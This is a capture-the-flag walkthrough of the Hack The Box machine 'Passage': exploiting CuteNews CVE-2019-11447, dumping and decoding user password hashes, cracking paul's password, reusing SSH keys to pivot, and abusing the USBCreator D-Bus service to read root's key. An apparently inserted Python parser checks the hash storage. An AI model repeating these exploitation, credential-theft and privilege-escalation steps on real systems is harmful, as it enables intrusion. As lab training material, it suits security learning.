The nmap scan reports only two open ports, 22 and 80. This makes things easier because it narrows the scope considerably; I decide to work on port 80.

# Nmap 7.80 scan initiated Sat Sep 12 22:17:26 2020 as: nmap -T5 --open -sS -vvv --min-rate=1000 --max-retries=2 -p- -oA full-ports 10.10.10.206
Nmap scan report for 10.10.10.206
Host is up, received echo-reply ttl 63 (0.055s latency).
Scanned at 2020-09-12 22:17:26 CEST for 43s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/local/bin/../share/nmap
# Nmap done at Sat Sep 12 22:18:09 2020 -- 1 IP address (1 host up) scanned in 43.19 seconds

Viewing the home page, I find myself in front of the CuteNews news manager.

One news item states that Fail2Ban has been implemented to prevent brute-forcing of directories and files, so I avoid launching dirb.

I search Google for CuteNews and come across a Metasploit exploit; looking at its source I see that it uses the URL http://IP/CuteNews. Visiting that address I find a login / registration form, and since the exploit requires authentication, I register.

When I can, I try to avoid using Metasploit, especially when practising on HTB. I keep searching on Google until I find an exploit on GitHub, uploaded recently; I strongly suspect it was developed specifically to be used on HTB. The exploit is the following:

https://github.com/CRFSlick/CVE-2019-11447-POC

I run it and, although I don't know the CuteNews version, it seems to work:

python3 CVE-2019-11447.py test test http://10.10.10.206/CuteNews/index.php

At this point, to get a more comfortable shell, I catch a reverse shell with netcat.

The first thing I do is check the CuteNews files to see whether there is a configuration file holding credentials. After some searching I come across the folder /var/www/html/CuteNews/cdata/users, which contains PHP files. Inside each file there is a base64 string which, once decoded, is a serialized PHP object with the registered users' information.

Note: this screenshot was captured after completing the machine.

I dump the contents of all the files into a single file for convenience:

find . -name '*.php' -exec cat {} \; > all.txt

YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6InNpZEBleGFtcGxlLmNvbSI7czo5OiJzaWQtbWVpZXIiO319
YToxOntzOjI6ImlkIjthOjE6e2k6MTYwMDQzNzM5NDtzOjEwOiJMV3RXR1dNYzNrIjt9fQ==
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo5OiJraW0tc3dpZnQiO2E6OTp7czoyOiJpZCI7czoxMDoiMTU5MjQ4MzMwOSI7czo0OiJuYW1lIjtzOjk6ImtpbS1zd2lmdCI7czozOiJhY2wiO3M6MToiMyI7czo1OiJlbWFpbCI7czoxNToia2ltQGV4YW1wbGUuY29tIjtzOjQ6Im5pY2siO3M6OToiS2ltIFN3aWZ0IjtzOjQ6InBhc3MiO3M6NjQ6ImY2NjlhNmY2OTFmOThhYjA1NjIzNTZjMGNkNWQ1ZTdkY2RjMjBhMDc5NDFjODZhZGNmY2U5YWYzMDg1ZmJlY2EiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3MDk2IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIzIjt9fX0=
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5ODgyOTgzMztzOjY6ImVncmU1NSI7fX0=
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo5OiJzaWQtbWVpZXIiO2E6OTp7czoyOiJpZCI7czoxMDoiMTU5MjQ4MzI4MSI7czo0OiJuYW1lIjtzOjk6InNpZC1tZWllciI7czozOiJhY2wiO3M6MToiMyI7czo1OiJlbWFpbCI7czoxNToic2lkQGV4YW1wbGUuY29tIjtzOjQ6Im5pY2siO3M6OToiU2lkIE1laWVyIjtzOjQ6InBhc3MiO3M6NjQ6IjRiZGQwYTBiYjQ3ZmM5ZjY2Y2JmMWE4OTgyZmQyZDM0NGQyYWVjMjgzZDFhZmFlYmI0NjUzZWMzOTU0ZGZmODgiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg1NjQ1IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImtpbUBleGFtcGxlLmNvbSI7czo5OiJraW0tc3dpZnQiO319
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzA0NztzOjU6ImFkbWluIjt9fQ==
YToxOntzOjI6ImlkIjthOjE6e2k6MTYwMDQzNzExNztzOjEwOiJvZDhwYnFQbERWIjt9fQ==
YToxOntzOjI6ImlkIjthOjE6e2k6MTYwMDQzNzY3NztzOjEwOiJRZk5BZkZ5aHRMIjt9fQ==
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzMwOTtzOjk6ImtpbS1zd2lmdCI7fX0=
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo1OiJhZG1pbiI7YTo4OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMDQ3IjtzOjQ6Im5hbWUiO3M6NToiYWRtaW4iO3M6MzoiYWNsIjtzOjE6IjEiO3M6NToiZW1haWwiO3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjQ6InBhc3MiO3M6NjQ6IjcxNDRhOGI1MzFjMjdhNjBiNTFkODFhZTE2YmUzYTgxY2VmNzIyZTExYjQzYTI2ZmRlMGNhOTdmOWUxNDg1ZTEiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3OTg4IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=
YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTg6Im9kOHBicVBsRFZAaGFjay5tZSI7czoxMDoib2Q4cGJxUGxEViI7fX0=
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImVncmU1NUB0ZXN0LmNvbSI7czo2OiJlZ3JlNTUiO319
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo0OiJwYXVsIjthOjE6e3M6MzoiYmFuIjtzOjEwOiIxNjAwNDM5NTAzIjt9fX0=
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTg6IlFmTkFmRnlodExAaGFjay5tZSI7czoxMDoiUWZOQWZGeWh0TCI7fX0=
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTg6IjZyWWdkSmVQYnpAaGFjay5tZSI7czoxMDoiNnJZZ2RKZVBieiI7fX0=
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTM6InRlc3RAdG9hc3QudG8iO3M6NDoidGVzdCI7fX0=
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjU6ImFkbWluIjt9fQ==
YToxOntzOjI6ImlkIjthOjE6e2k6MTYwMDQzNzE1MztzOjEwOiJ4WG5GMkkxbFhoIjt9fQ==
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6OToia2lrYXNAaHRiIjtzOjU6Imtpa2FzIjt9fQ==
YToxOntzOjI6ImlkIjthOjE6e2k6MTYwMDQzNjk1MztzOjEwOiI2cllnZEplUGJ6Ijt9fQ==
YToxOntzOjU6ImVtYWlsIjthOjI6e3M6MjA6ImhhY2tlckBoYWNrZXIuaGFja2VyIjtzOjY6ImhhY2tlciI7czoxODoiTFd0V0dXTWMza0BoYWNrLm1lIjtzOjEwOiJMV3RXR1dNYzNrIjt9fQ==
YToxOntzOjI6ImlkIjthOjE6e2k6MTYwMDQzNzI5NjtzOjU6Imtpa2FzIjt9fQ==
YToxOntzOjI6ImlkIjthOjI6e2k6MTU5MjQ4MzI4MTtzOjk6InNpZC1tZWllciI7aToxNjAwNDM3NDY3O3M6NDoidGVzdCI7fX0=
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzIzNjtzOjEwOiJwYXVsLWNvbGVzIjt9fQ==

I decode the strings and obtain the users:

a:1:{s:5:"email";a:1:{s:15:"sid@example.com";s:9:"sid-meier";}}
a:1:{s:2:"id";a:1:{i:1600437394;s:10:"LWtWGWMc3k";}}
a:1:{s:4:"name";a:1:{s:10:"od8pbqPlDV";a:9:{s:2:"id";s:10:"1600437117";s:4:"name";s:10:"od8pbqPlDV";s:3:"acl";s:1:"4";s:5:"email";s:18:"od8pbqPlDV@hack.me";s:4:"nick";s:10:"od8pbqPlDV";s:4:"pass";s:64:"0046daebdd6e238b1a8e1efc41d128c37294b1e9af4c3bd26dd23fdb765b1805";s:4:"more";s:60:"YToyOntzOjQ6InNpdGUiO3M6MDoiIjtzOjU6ImFib3V0IjtzOjA6IiI7fQ==";s:6:"avatar";s:32:"avatar_od8pbqPlDV_od8pbqPlDV.php";s:6:"e-hide";s:0:"";}}}
a:1:{s:4:"name";a:1:{s:10:"QfNAfFyhtL";a:9:{s:2:"id";s:10:"1600437677";s:4:"name";s:10:"QfNAfFyhtL";s:3:"acl";s:1:"4";s:5:"email";s:18:"QfNAfFyhtL@hack.me";s:4:"nick";s:10:"QfNAfFyhtL";s:4:"pass";s:64:"d055000dae407c0b5b27567898b781cc797731938972b27e7fc1fd28be4132ce";s:4:"more";s:60:"YToyOntzOjQ6InNpdGUiO3M6MDoiIjtzOjU6ImFib3V0IjtzOjA6IiI7fQ==";s:6:"avatar";s:32:"avatar_QfNAfFyhtL_QfNAfFyhtL.php";s:6:"e-hide";s:0:"";}}}
a:1:{s:4:"name";a:1:{s:9:"kim-swift";a:9:{s:2:"id";s:10:"1592483309";s:4:"name";s:9:"kim-swift";s:3:"acl";s:1:"3";s:5:"email";s:15:"kim@example.com";s:4:"nick";s:9:"Kim Swift";s:4:"pass";s:64:"f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca";s:3:"lts";s:10:"1592487096";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"3";}}}
a:2:{s:2:"id";a:1:{i:1598910896;s:6:"hacker";}s:4:"name";a:1:{s:10:"6rYgdJePbz";a:9:{s:2:"id";s:10:"1600436953";s:4:"name";s:10:"6rYgdJePbz";s:3:"acl";s:1:"4";s:5:"email";s:18:"6rYgdJePbz@hack.me";s:4:"nick";s:10:"6rYgdJePbz";s:4:"pass";s:64:"71069cd45eb12e5618d196b5399aa5954d725d938c1b09afe147c3b074448891";s:4:"more";s:60:"YToyOntzOjQ6InNpdGUiO3M6MDoiIjtzOjU6ImFib3V0IjtzOjA6IiI7fQ==";s:6:"avatar";s:32:"avatar_6rYgdJePbz_6rYgdJePbz.php";s:6:"e-hide";s:0:"";}}}
a:1:{s:2:"id";a:1:{i:1598829833;s:6:"egre55";}}
a:1:{s:4:"name";a:1:{s:5:"kikas";a:11:{s:3:"ban";s:1:"0";s:2:"id";s:10:"1600437296";s:4:"name";s:5:"kikas";s:3:"acl";s:1:"4";s:5:"email";s:9:"kikas@htb";s:4:"nick";s:5:"kikas";s:4:"pass";s:64:"42a0e5a0a5404e5f695faf8e59d67dfcb3c11ba09fc0788d64fa4df6c8002eeb";s:3:"lts";s:10:"1600437457";s:4:"more";s:60:"YToyOntzOjQ6InNpdGUiO3M6MDoiIjtzOjU6ImFib3V0IjtzOjA6IiI7fQ==";s:6:"avatar";s:25:"avatar_kikas_hotqafgf.php";s:6:"e-hide";s:0:"";}}}
a:1:{s:4:"name";a:1:{s:9:"sid-meier";a:9:{s:2:"id";s:10:"1592483281";s:4:"name";s:9:"sid-meier";s:3:"acl";s:1:"3";s:5:"email";s:15:"sid@example.com";s:4:"nick";s:9:"Sid Meier";s:4:"pass";s:64:"4bdd0a0bb47fc9f66cbf1a8982fd2d344d2aec283d1afaebb4653ec3954dff88";s:3:"lts";s:10:"1592485645";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}
a:1:{s:5:"email";a:1:{s:15:"kim@example.com";s:9:"kim-swift";}}
a:1:{s:2:"id";a:1:{i:1592483047;s:5:"admin";}}
a:1:{s:2:"id";a:1:{i:1600437117;s:10:"od8pbqPlDV";}}
a:1:{s:2:"id";a:1:{i:1600437677;s:10:"QfNAfFyhtL";}}
a:1:{s:2:"id";a:1:{i:1592483309;s:9:"kim-swift";}}
a:1:{s:4:"name";a:1:{s:5:"admin";a:8:{s:2:"id";s:10:"1592483047";s:4:"name";s:5:"admin";s:3:"acl";s:1:"1";s:5:"email";s:17:"nadav@passage.htb";s:4:"pass";s:64:"7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1";s:3:"lts";s:10:"1592487988";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}
a:1:{s:4:"name";a:1:{s:10:"paul-coles";a:9:{s:2:"id";s:10:"1592483236";s:4:"name";s:10:"paul-coles";s:3:"acl";s:1:"2";s:5:"email";s:16:"paul@passage.htb";s:4:"nick";s:10:"Paul Coles";s:4:"pass";s:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";s:3:"lts";s:10:"1592485556";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}
a:2:{s:5:"email";a:1:{s:16:"paul@passage.htb";s:10:"paul-coles";}s:4:"name";a:2:{s:4:"test";a:11:{s:3:"ban";s:1:"0";s:2:"id";s:10:"1600437467";s:4:"name";s:4:"test";s:3:"acl";s:1:"4";s:5:"email";s:13:"test@toast.to";s:4:"nick";s:0:"";s:4:"pass";s:64:"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08";s:3:"lts";s:10:"1600437549";s:4:"more";s:4:"Tjs=";s:6:"avatar";s:21:"avatar_test_75307.php";s:6:"e-hide";s:0:"";}s:16:"paul@passage.htb";a:1:{s:3:"ban";s:10:"1600439513";}}}
a:1:{s:5:"email";a:1:{s:18:"od8pbqPlDV@hack.me";s:10:"od8pbqPlDV";}}
a:1:{s:5:"email";a:1:{s:15:"egre55@test.com";s:6:"egre55";}}
a:1:{s:4:"name";a:2:{s:6:"egre55";a:11:{s:2:"id";s:10:"1598829833";s:4:"name";s:6:"egre55";s:3:"acl";s:1:"4";s:5:"email";s:15:"egre55@test.com";s:4:"nick";s:6:"egre55";s:4:"pass";s:64:"4db1f0bfd63be058d4ab04f18f65331ac11bb494b5792c480faf7fb0c40fa9cc";s:4:"more";s:60:"YToyOntzOjQ6InNpdGUiO3M6MDoiIjtzOjU6ImFib3V0IjtzOjA6IiI7fQ==";s:3:"lts";s:10:"1598906881";s:3:"ban";s:1:"0";s:6:"avatar";s:26:"avatar_egre55_ykxnacpt.php";s:6:"e-hide";s:0:"";}s:6:"hacker";a:11:{s:2:"id";s:10:"1598910896";s:4:"name";s:6:"hacker";s:3:"acl";s:1:"4";s:5:"email";s:20:"hacker@hacker.hacker";s:4:"nick";s:6:"hacker";s:4:"pass";s:64:"e7d3685715939842749cc27b38d0ccb9706d4d14a5304ef9eee093780eab5df9";s:3:"lts";s:10:"1598910911";s:3:"ban";s:1:"0";s:4:"more";s:60:"YToyOntzOjQ6InNpdGUiO3M6MDoiIjtzOjU6ImFib3V0IjtzOjA6IiI7fQ==";s:6:"avatar";s:26:"avatar_hacker_jpyoyskt.php";s:6:"e-hide";s:0:"";}}}
a:1:{s:4:"name";a:1:{s:4:"paul";a:1:{s:3:"ban";s:10:"1600439503";}}}
a:1:{s:5:"email";a:1:{s:18:"QfNAfFyhtL@hack.me";s:10:"QfNAfFyhtL";}}
a:1:{s:4:"name";a:1:{s:10:"LWtWGWMc3k";a:9:{s:2:"id";s:10:"1600437394";s:4:"name";s:10:"LWtWGWMc3k";s:3:"acl";s:1:"4";s:5:"email";s:18:"LWtWGWMc3k@hack.me";s:4:"nick";s:10:"LWtWGWMc3k";s:4:"pass";s:64:"5d9124e94af5db720e60727702b1716972cd614840d9f8c702f7305d4e6a8058";s:4:"more";s:60:"YToyOntzOjQ6InNpdGUiO3M6MDoiIjtzOjU6ImFib3V0IjtzOjA6IiI7fQ==";s:6:"avatar";s:32:"avatar_LWtWGWMc3k_LWtWGWMc3k.php";s:6:"e-hide";s:0:"";}}}
a:1:{s:5:"email";a:1:{s:18:"6rYgdJePbz@hack.me";s:10:"6rYgdJePbz";}}
a:2:{s:4:"name";a:1:{s:10:"xXnF2I1lXh";a:9:{s:2:"id";s:10:"1600437153";s:4:"name";s:10:"xXnF2I1lXh";s:3:"acl";s:1:"4";s:5:"email";s:18:"xXnF2I1lXh@hack.me";s:4:"nick";s:10:"xXnF2I1lXh";s:4:"pass";s:64:"b244eddb1168e828955ed6000055cce4977e134b6a5bb8a47b5a32bcc9b967b9";s:4:"more";s:60:"YToyOntzOjQ6InNpdGUiO3M6MDoiIjtzOjU6ImFib3V0IjtzOjA6IiI7fQ==";s:6:"avatar";s:32:"avatar_xXnF2I1lXh_xXnF2I1lXh.php";s:6:"e-hide";s:0:"";}}s:5:"email";a:1:{s:18:"xXnF2I1lXh@hack.me";s:10:"xXnF2I1lXh";}}
a:1:{s:5:"email";a:1:{s:13:"test@toast.to";s:4:"test";}}
a:1:{s:5:"email";a:1:{s:17:"nadav@passage.htb";s:5:"admin";}}
a:1:{s:2:"id";a:1:{i:1600437153;s:10:"xXnF2I1lXh";}}
a:1:{s:5:"email";a:1:{s:9:"kikas@htb";s:5:"kikas";}}
a:1:{s:2:"id";a:1:{i:1600436953;s:10:"6rYgdJePbz";}}
a:1:{s:5:"email";a:2:{s:20:"hacker@hacker.hacker";s:6:"hacker";s:18:"LWtWGWMc3k@hack.me";s:10:"LWtWGWMc3k";}}
a:1:{s:2:"id";a:1:{i:1600437296;s:5:"kikas";}}
a:1:{s:2:"id";a:2:{i:1592483281;s:9:"sid-meier";i:1600437467;s:4:"test";}}
a:1:{s:2:"id";a:1:{i:1592483236;s:10:"paul-coles";}}

There are several serialized objects representing the users registered on the site. In some of the objects the hashed password is visible.

Poking around inside the machine I see that there are two user accounts: paul and nadav.

Among the users I found in the previous file there is one named paul; I take his password hash and paste it here:

https://www.tunnelsup.com/hash-analyzer/

The site tells me that it is a SHA-256 hash.

I try to crack the hash with hashcat and obtain the password: atlanta1
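The decoding step above (base64 to PHP serialize() text to user records) and the hash-type identification can both be done offline with a small parser. The following is an added example, not code from the original write-up or from CuteNews: it implements a minimal reader for PHP's serialize() format, pulls the per-user records out of the cdata/users entries, and, from a defender's point of view, checks how the passwords are stored. The record strings embedded below are copied from the page (the admin record, its id index entry, and the decoded record containing the author's own "test" account, which the exploit command registered with the password "test"). Because the stored value for that account equals the plain SHA-256 of its password, the check confirms that CuteNews stores unsalted SHA-256 digests, which is exactly why a wordlist attack on paul's hash succeeds; the mitigation is a salted, slow password hash.

```python
"""Decode CuteNews cdata/users records and inspect how passwords are stored.
Added example, not code from the original write-up; the record strings in
RECORDS are copied from the page."""
import base64
import hashlib
import re


class PhpUnserializeError(ValueError):
    pass


def _expect(t, pos, ch):
    if pos >= len(t) or t[pos] != ch:
        raise PhpUnserializeError(f"expected {ch!r} at offset {pos}")


def _parse(t, pos):
    """Parse one serialize() value starting at t[pos]; return (value, next_pos)."""
    tag = t[pos]
    if tag == "N":                                  # N;
        _expect(t, pos + 1, ";")
        return None, pos + 2
    if tag in "ibd":                                # i:123;  b:1;  d:1.5;
        end = t.index(";", pos)
        raw = t[pos + 2:end]
        val = int(raw) if tag == "i" else (raw == "1" if tag == "b" else float(raw))
        return val, end + 1
    if tag == "s":                                  # s:<byte length>:"...";
        colon = t.index(":", pos + 2)
        length = int(t[pos + 2:colon])
        _expect(t, colon + 1, '"')
        start = colon + 2
        _expect(t, start + length, '"')             # length-prefixed, so quotes inside are fine
        _expect(t, start + length + 1, ";")
        return t[start:start + length], start + length + 2
    if tag == "a":                                  # a:<count>:{key value ...}
        colon = t.index(":", pos + 2)
        count = int(t[pos + 2:colon])
        _expect(t, colon + 1, "{")
        pos = colon + 2
        out = {}
        for _ in range(count):
            key, pos = _parse(t, pos)
            val, pos = _parse(t, pos)
            out[key] = val
        _expect(t, pos, "}")
        return out, pos + 1
    raise PhpUnserializeError(f"unsupported tag {tag!r} at offset {pos}")


def php_unserialize(data: bytes):
    # latin-1 keeps one character per byte, so s:N: lengths line up with slicing
    text = data.decode("latin-1")
    value, end = _parse(text, 0)
    if end != len(text):
        raise PhpUnserializeError(f"trailing data at offset {end}")
    return value


def load_record(raw: str) -> dict:
    """Accept either the base64 form stored on disk or already-decoded serialize() text."""
    raw = raw.strip()
    data = raw.encode("latin-1") if raw.startswith("a:") else base64.b64decode(raw)
    return php_unserialize(data)


def extract_users(records):
    """Collect username -> {acl, email, pass} from the 'name' index of each record.
    Index-only entries (the 'id' and 'email' maps, or ban markers) carry no 'pass'
    and are skipped."""
    users = {}
    for raw in records:
        for username, rec in load_record(raw).get("name", {}).items():
            if isinstance(rec, dict) and "pass" in rec:
                users[username] = {"acl": rec.get("acl"), "email": rec.get("email"), "pass": rec["pass"]}
    return users


HEX64 = re.compile(r"^[0-9a-f]{64}$")


def storage_findings(users, known_plaintexts=None):
    """Defender view: does each stored value look like a bare 64-hex digest, and for
    accounts whose password we legitimately know (our own), does plain SHA-256 of
    that password reproduce the stored value (i.e. no salt, no work factor)?"""
    known_plaintexts = known_plaintexts or {}
    findings = {}
    for name, u in users.items():
        unsalted = None
        if name in known_plaintexts:
            unsalted = hashlib.sha256(known_plaintexts[name].encode()).hexdigest() == u["pass"]
        findings[name] = {"looks_like_sha256": bool(HEX64.match(u["pass"])),
                          "confirmed_unsalted_sha256": unsalted,
                          "is_admin": u["acl"] == "1"}   # acl 1 is the admin level in the dump
    return findings


# Copied from the write-up: admin 'name' record (base64), admin 'id' index entry
# (base64), and the decoded record holding the author's own 'test' account.
RECORDS = [
    "YToxOntzOjQ6Im5hbWUiO2E6MTp7czo1OiJhZG1pbiI7YTo4OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMDQ3IjtzOjQ6Im5hbWUiO3M6NToiYWRtaW4iO3M6MzoiYWNsIjtzOjE6IjEiO3M6NToiZW1haWwiO3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjQ6InBhc3MiO3M6NjQ6IjcxNDRhOGI1MzFjMjdhNjBiNTFkODFhZTE2YmUzYTgxY2VmNzIyZTExYjQzYTI2ZmRlMGNhOTdmOWUxNDg1ZTEiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3OTg4IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=",
    "YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzA0NztzOjU6ImFkbWluIjt9fQ==",
    'a:2:{s:5:"email";a:1:{s:16:"paul@passage.htb";s:10:"paul-coles";}s:4:"name";a:2:{s:4:"test";a:11:{s:3:"ban";s:1:"0";s:2:"id";s:10:"1600437467";s:4:"name";s:4:"test";s:3:"acl";s:1:"4";s:5:"email";s:13:"test@toast.to";s:4:"nick";s:0:"";s:4:"pass";s:64:"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08";s:3:"lts";s:10:"1600437549";s:4:"more";s:4:"Tjs=";s:6:"avatar";s:21:"avatar_test_75307.php";s:6:"e-hide";s:0:"";}s:16:"paul@passage.htb";a:1:{s:3:"ban";s:10:"1600439513";}}}',
]

if __name__ == "__main__":
    users = extract_users(RECORDS)
    for name, finding in storage_findings(users, {"test": "test"}).items():
        print(name, users[name]["email"], finding)
```

Run it on the files collected with the find command from the write-up by reading each cdata/users/*.php entry into RECORDS; the only account you should supply a known plaintext for is one you registered yourself.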

I try to connect via SSH but it doesn't work, since my machine is not among the authorized ones (public key).

I spawn a TTY shell with python -c 'import pty; pty.spawn("/bin/bash")' and try the command su paul:

At this point I go through the /home/paul folder and inside .ssh I find paul's private key id_rsa; with this I can connect via SSH:

-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----

Also inside paul's .ssh folder is the authorized_keys file; analysing its contents I notice that it contains nadav's public key.

At this point I simply run ssh nadav@localhost

Oh, I forgot: as paul I grabbed the user flag.

As nadav, the first thing I do is analyse the processes, but there doesn't seem to be anything unusual. After an exhausting search, by chance I open the .viminfo file inside nadav's home. The viminfo file is vim's cache; inside it I see that some files have been edited, including /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf.

Searching on Google I discover that there is a vulnerability in the USBCreator D-Bus interface that would allow privilege escalation. For the details I refer you to the article:

https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/

At the end of the article it is explained how, because of the vulnerability, it is possible to read and overwrite otherwise inaccessible files without any password prompt.

Inspecting the source code for the service, we see that it contains a Python implementation of the Unix tool dd. This tool can be used, among other things, to copy files between locations. The input to the method _builtin_dd is taken directly from user input. Furthermore, no path sanitation checks are performed on the source or target path, and no password prompts are being used – this allows a user to overwrite arbitrary files on the filesystem, as root, with no password prompting.

So I run the command and copy root's private SSH key.

Finally I log in with SSH and grab the flag.